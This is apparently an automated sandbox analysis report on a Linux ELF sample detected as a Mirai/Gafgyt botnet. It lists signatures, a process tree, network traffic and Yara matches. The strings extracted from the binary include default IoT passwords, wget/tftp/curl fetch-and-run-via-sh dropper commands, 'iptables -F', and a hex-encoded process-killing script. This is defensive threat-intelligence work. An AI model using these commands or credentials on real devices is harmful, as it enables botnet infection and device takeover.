Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
i686.elf

Overview

General Information

Sample name:i686.elf
Analysis ID:1584145
MD5:de886e3e02a867403aebfc5f52c0c7e7
SHA1:52d5514bc95dbecbd2a631686814d4b45a31cc64
SHA256:2f11adfdb530423be5429348227dbd1a22de1d328ee1c13aeebd7b927910d618
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:92
Range:0 - 100
Whitelisted:false

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Deletes system log files
Machine Learning detection for sample
Performs DNS TXT record lookups
Sample tries to access files in /etc/config/ (typical for OpenWRT routers)
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes the "rm" command used to delete files or directories
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Yara signature match

Classification

General Information

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1584145
Start date and time:2025-01-04 14:12:05 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 56s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:i686.elf
Detection:MAL
Classification:mal92.troj.evad.linELF@0/1@31/0

Warnings

  • VT rate limit hit for: ai.stackoverflow.libre

Runtime Messages

Command:/tmp/i686.elf
PID:6231
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
thIs wEek on xLaB aNd fOxNoIntel lEarNs sHiT
Standard Error:

Process Tree

  • system is lnxubuntu20
  • i686.elf (PID: 6231, Parent: 6152, MD5: de886e3e02a867403aebfc5f52c0c7e7) Arguments: /tmp/i686.elf
    • i686.elf New Fork (PID: 6253, Parent: 6231)
    • i686.elf New Fork (PID: 6254, Parent: 6231)
    • i686.elf New Fork (PID: 6271, Parent: 6231)
    • i686.elf New Fork (PID: 6289, Parent: 6231)
    • i686.elf New Fork (PID: 6316, Parent: 6231)
  • dash New Fork (PID: 6232, Parent: 4332)
  • rm (PID: 6232, Parent: 4332, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.HqFju0SPpt /tmp/tmp.kLRmTDpoAt /tmp/tmp.hnjsezfpAX
  • dash New Fork (PID: 6233, Parent: 4332)
  • rm (PID: 6233, Parent: 4332, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.HqFju0SPpt /tmp/tmp.kLRmTDpoAt /tmp/tmp.hnjsezfpAX
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
i686.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
    i686.elfLinux_Trojan_Gafgyt_9e9530a7unknownunknown
    • 0xe038:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
    i686.elfLinux_Trojan_Gafgyt_807911a2unknownunknown
    • 0xe827:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
    i686.elfLinux_Trojan_Gafgyt_d4227dbfunknownunknown
    • 0xa536:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
    • 0xa698:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
    i686.elfLinux_Trojan_Gafgyt_d996d335unknownunknown
    • 0x1125a:$a: D0 EB 0F 40 38 37 75 04 48 89 F8 C3 49 FF C8 48 FF C7 4D 85 C0
    Click to see the 3 entries

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    6271.1.0000000000400000.0000000000416000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      6271.1.0000000000400000.0000000000416000.r-x.sdmpLinux_Trojan_Gafgyt_9e9530a7unknownunknown
      • 0xe038:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
      6271.1.0000000000400000.0000000000416000.r-x.sdmpLinux_Trojan_Gafgyt_807911a2unknownunknown
      • 0xe827:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
      6271.1.0000000000400000.0000000000416000.r-x.sdmpLinux_Trojan_Gafgyt_d4227dbfunknownunknown
      • 0xa536:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
      • 0xa698:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
      6271.1.0000000000400000.0000000000416000.r-x.sdmpLinux_Trojan_Gafgyt_d996d335unknownunknown
      • 0x1125a:$a: D0 EB 0F 40 38 37 75 04 48 89 F8 C3 49 FF C8 48 FF C7 4D 85 C0
      Click to see the 11 entries

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-04T14:13:01.897730+010020135141A Network Trojan was detected192.168.2.235018594.16.114.25453UDP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: i686.elfVirustotal: Detection: 29%Perma Link
      Source: i686.elfReversingLabs: Detection: 36%
      Machine Learning detection for sample
      Source: i686.elfJoe Sandbox ML: detected
      Source: i686.elfString: ash|login|wget|curl|tftp|ntpdate|ftp
      Source: i686.elfString: /proc//cmdline/mapsselfrebootwgetunmount-shashtftpcurl/bin/login|ash|login|wget|curl|tftp|ntpdate|ftp/proc/mounts (deleted)/proc/%s/statusPPid:/fdsocket|proc/usr/bin/usr/sbin/system/mnt/mtd/app/org/z/zbin/home/app/dvr/bin/duksan/userfs/mnt/app/usr/etc/dvr/main/usr/local/var/bin/tmp/sqfs/z/bin/dvr/mnt/mtd/zconf/gm/bin/home/process/var/challenge/var/Sofia/usr/lib/lib/systemd//usr/lib/systemd/system/system/bin//mnt//home/helper/home/davinci/usr/libexec//sbin/
      Source: i686.elfString: /bin/busybox echo -ne >> > upnpPon521rootZte521root621oelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinzlxx.7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_jat0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantechdreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123ipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxservicepasswordsupportadmintelnetadminadmintelecomguestusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8tluafed20150602vstarcam2015supporthikvisione8ehomeasbe8ehomee8telnetcisco/bin/busyboxenablelinuxshellping ;sh/bin/busybox hostname FICORAiptables -F/bin/busybox echo > .ri && sh .ri && cd rm -rf dvrEncoder rtspd dvrUpdater dvrDecoder dvrRecorder ptzcontrol .ntpfsh .ntpf/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrep.echowEek/var//var/run//var/tmp//dev//dev/shm//etc//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63\x2F\x2A\3B""\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A\x20\x20\x23\x20\x53\x6B\x69\x70\x20\x6E\x6F\x6E\x2D""\x6E\x75\x6D\x65\x72\x69\x63\x20\x64\x69\x72\x65\x63\x74\x6F\x72\x69\x65\x73\x0A\x20\x20\x69\x66\x20\x21\x20\x5B\x20\x22\x24\x70\x69\x64\x22\x20\x2D\x65""\x71\x20\x22\x24\x70\x69\x64\x22\x20\x5D\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x63\x6F\x6E\x74""\x69\x6E\x75\x65\x0A\x20\x20\x66\x69\x0A\x0A\x20\x20\x23\x20\x47\x65\x74\x20\x74\x68\x65\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x20\x6C\x69\x6E\x65\x20\x6F\x66""\x20\x74\x68\x65\x20\x70\x72\x6F\x63\x65\x73\x73\x0A\x20\x20\x63\x6D\x64\x6C\x69\x6E\x65\x3D\x24\x28\x74\x72\x20\x27\x5C\x30\x27\x20\x27\x20\x27\x20\x3C""\x20\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x63\x6D\x64\x6C\x69\x6E\x65\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x23""\x20\x43\x68\x65\x63\x6B\x20\x69\x66\x20\x74\x68\x65\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x20\x6C\x69\x6E\x65\x20\x63\x6F\x6E\x74\x61\x69\x6E\x73\x20\x22\x64""\x76\x72\x48\x65\x6C\x70\x65\x72\x22\x0A\x20\x20\x69\x66\x20\x65\x63\x68\x6F\x20\x22\x24\x63\x6D\x64\x6C\x69\x6E\x65\x22\x20\x7C\x20\x67\x72\x65\x70\x20\x2D""\x71\x20\x22\x64\x76\x72\x48\x65\x6C\x70\x65\x72\x22\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64""\x22\x0A\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mipsmpslppcspcsh4'

      Networking

      barindex
      Suricata IDS alerts for network traffic
      Source: Network trafficSuricata IDS: 2013514 - Severity 1 - ET MALWARE Potential DNS Command and Control via TXT queries : 192.168.2.23:50185 -> 94.16.114.254:53
      Connects to many ports of the same IP (likely port scanning)
      Source: global trafficTCP traffic: 188.166.182.194 ports 18234,49657,64715,1,62849,4,5,6,7,31428,10321,5837
      Source: global trafficTCP traffic: 192.168.2.23:49512 -> 188.166.182.194:64715
      Source: global trafficUDP traffic: 192.168.2.23:56278 -> 74.125.250.129:19302
      Source: /tmp/i686.elf (PID: 6231)Socket: 127.0.0.1:43478Jump to behavior
      Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
      Source: unknownTCP traffic detected without corresponding DNS query: 7.225.0.137
      Source: unknownTCP traffic detected without corresponding DNS query: 7.225.0.137
      Source: unknownTCP traffic detected without corresponding DNS query: 111.20.77.101
      Source: unknownTCP traffic detected without corresponding DNS query: 17.199.119.32
      Source: unknownTCP traffic detected without corresponding DNS query: 111.20.77.101
      Source: unknownTCP traffic detected without corresponding DNS query: 132.205.38.242
      Source: unknownTCP traffic detected without corresponding DNS query: 17.199.119.32
      Source: unknownTCP traffic detected without corresponding DNS query: 9.154.164.42
      Source: unknownTCP traffic detected without corresponding DNS query: 132.205.38.242
      Source: unknownTCP traffic detected without corresponding DNS query: 9.154.164.42
      Source: unknownTCP traffic detected without corresponding DNS query: 176.165.177.4
      Source: unknownTCP traffic detected without corresponding DNS query: 176.165.177.4
      Source: unknownTCP traffic detected without corresponding DNS query: 148.229.207.112
      Source: unknownTCP traffic detected without corresponding DNS query: 148.229.207.112
      Source: unknownTCP traffic detected without corresponding DNS query: 148.229.207.112
      Source: unknownTCP traffic detected without corresponding DNS query: 176.165.177.4
      Source: unknownTCP traffic detected without corresponding DNS query: 132.205.38.242
      Source: unknownTCP traffic detected without corresponding DNS query: 111.20.77.101
      Source: unknownTCP traffic detected without corresponding DNS query: 7.225.0.137
      Source: unknownTCP traffic detected without corresponding DNS query: 9.154.164.42
      Source: unknownTCP traffic detected without corresponding DNS query: 17.199.119.32
      Source: unknownTCP traffic detected without corresponding DNS query: 176.165.177.4
      Source: unknownTCP traffic detected without corresponding DNS query: 148.229.207.112
      Source: unknownTCP traffic detected without corresponding DNS query: 111.20.77.101
      Source: unknownTCP traffic detected without corresponding DNS query: 132.205.38.242
      Source: unknownTCP traffic detected without corresponding DNS query: 7.225.0.137
      Source: unknownTCP traffic detected without corresponding DNS query: 17.199.119.32
      Source: unknownTCP traffic detected without corresponding DNS query: 9.154.164.42
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
      Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
      Source: global trafficDNS traffic detected: DNS query: ai.stackoverflow.libre
      Source: i686.elfString found in binary or memory: http:///curl.sh
      Source: i686.elfString found in binary or memory: http:///wget.sh
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33606
      Source: unknownNetwork traffic detected: HTTP traffic on port 33606 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
      Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
      Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
      Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
      Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
      Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
      Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_1cb033f3 Author: unknown
      Source: 6271.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
      Source: 6271.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
      Source: 6271.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
      Source: 6271.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
      Source: 6271.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
      Source: 6271.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
      Source: 6271.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_1cb033f3 Author: unknown
      Source: 6231.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
      Source: 6231.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
      Source: 6231.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
      Source: 6231.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
      Source: 6231.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
      Source: 6231.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
      Source: 6231.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_1cb033f3 Author: unknown
      Source: Initial sampleString containing 'busybox' found: usage: busybox
      Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne
      Source: Initial sampleString containing 'busybox' found: /bin/busybox
      Source: Initial sampleString containing 'busybox' found: /bin/busybox hostname FICORA
      Source: Initial sampleString containing 'busybox' found: /bin/busybox echo >
      Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://
      Source: Initial sampleString containing 'busybox' found: /wget.sh -O- | sh;/bin/busybox tftp -g
      Source: Initial sampleString containing 'busybox' found: -r tftp.sh -l- | sh;/bin/busybox ftpget
      Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrep.echo
      Source: Initial sampleString containing 'busybox' found: 191.235.89.0191.234.196.0191.235.53.0134.0.0.035.195.135.035.195.136.035.195.137.035.195.138.035.195.14.035.195.140.035.195.142.035.195.144.035.195.145.035.195.147.035.195.148.035.195.149.035.195.15.035.195.152.035.195.153.035.195.154.035.195.157.035.195.158.035.195.160.035.195.161.035.195.162.035.195.163.035.195.164.035.195.165.035.195.166.035.195.169.035.195.170.035.195.171.035.195.172.035.195.173.035.195.174.035.195.175.035.195.179.035.195.18.035.195.180.035.195.181.035.195.182.035.195.183.035.195.185.035.195.187.035.195.188.035.195.189.035.195.19.035.195.190.035.195.192.035.195.195.035.195.198.035.195.199.035.195.202.035.195.203.035.195.204.035.195.207.035.195.208.035.195.210.035.195.212.035.195.213.035.195.214.035.195.217.035.195.219.035.195.22.035.195.220.035.195.221.035.195.222.035.195.223.035.195.227.035.195.228.035.195.229.035.195.23.035.195.237.035.195.241.035.195.242.035.195.244.035.195.245.035.195.249.035.195.251.035.195.253.035.195.254.035.195.26.035.195.28.035.195.29.035.195.3.035.195.31.035.195
      Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne >> > upnpPon521rootZte521root621oelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinzlxx.7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_jat0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantechdreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123ipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxservicepasswordsupportadmintelnetadminadmintelecomguestusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8tluafed20150602vstarcam2015supporthikvisione8ehomeasbe8ehomee8telnetcisco/bin/busyboxenablelinuxshellping ;sh/bin/busybox hostname FICORAiptables -F/bin/busybox echo > .ri && sh .ri && cd rm -rf dvrEncoder rtspd dvrUpdater dvrDecoder dvrRecorder ptzcontrol .ntpfsh .ntpf/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybo
      Source: ELF static info symbol of initial sample.symtab present: no
      Source: /tmp/i686.elf (PID: 6253)SIGKILL sent: pid: 936, result: successfulJump to behavior
      Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
      Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
      Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
      Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
      Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
      Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
      Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_1cb033f3 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 49201ab37ff0b5cdfa9b0b34b6faa170bd25f04df51c24b0b558b7534fecc358, id = 1cb033f3-68c1-4fe5-9cd1-b5d066c1d86e, last_modified = 2021-09-16
      Source: 6271.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
      Source: 6271.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
      Source: 6271.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
      Source: 6271.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
      Source: 6271.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
      Source: 6271.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
      Source: 6271.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_1cb033f3 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 49201ab37ff0b5cdfa9b0b34b6faa170bd25f04df51c24b0b558b7534fecc358, id = 1cb033f3-68c1-4fe5-9cd1-b5d066c1d86e, last_modified = 2021-09-16
      Source: 6231.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
      Source: 6231.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
